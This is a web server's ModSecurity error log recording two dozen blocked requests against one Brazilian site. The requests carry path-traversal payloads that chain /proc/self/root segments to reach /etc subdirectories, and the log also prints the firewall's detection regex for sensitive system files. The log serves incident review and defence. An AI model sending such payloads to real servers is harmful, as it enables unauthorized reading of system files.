[Wed Mar 18 14:19:42.824978 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:53830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abreruyqAr6etmhZHNrsBwAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:19:53.407309 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:33230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abreuQkwaGbbGflqUZA18wAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:19:54.920209 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:48814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abreukzinOy1jxa1j4c98wAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:19:56.255134 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.241.31:48820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrevAbLMZ6AikZjR9XjtwAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:19:57.549249 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.241.31:56802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrevSmAPhZkrhU8w4mRVwAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:07.286924 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:56818] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrex_u8EFLIOrSqIpsmbgAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:12.071093 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:42990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abreyuoXxyEfFpUF8f-VPAAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:13.523506 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:42996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrezQkwaGbbGflqUZA2DAAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:14.842942 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:43010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrezsdf6f5d65gmYZT5VgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:15.487075 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:53836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrezwkwaGbbGflqUZA2DgAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:20:16.183298 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.241.31:43022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre0AbLMZ6AikZjR9XjwwAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:19.350766 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:60702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre08df6f5d65gmYZT5WQAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:23.322777 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.241.31:60714] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre1ymAPhZkrhU8w4mRYwAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:24.682991 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.241.31:60720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre2CmAPhZkrhU8w4mRZQAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:27.019102 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:60722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre2-oXxyEfFpUF8f-VXwAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:28.338069 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:57980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre3Mdf6f5d65gmYZT5XAAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:29.675461 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:57982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre3da6ubjKNq_cu4bDEAAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:30.917650 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:57998] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre3uyqAr6etmhZHNrsIQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:35.784655 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:58006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre4sdf6f5d65gmYZT5ZAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:37.354214 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:48218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre5da6ubjKNq_cu4bDFQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:39.599322 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.241.31:48222] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre5wbLMZ6AikZjR9XjzwAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:20:40.872020 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:41644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abre6OoXxyEfFpUF8f-VawAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
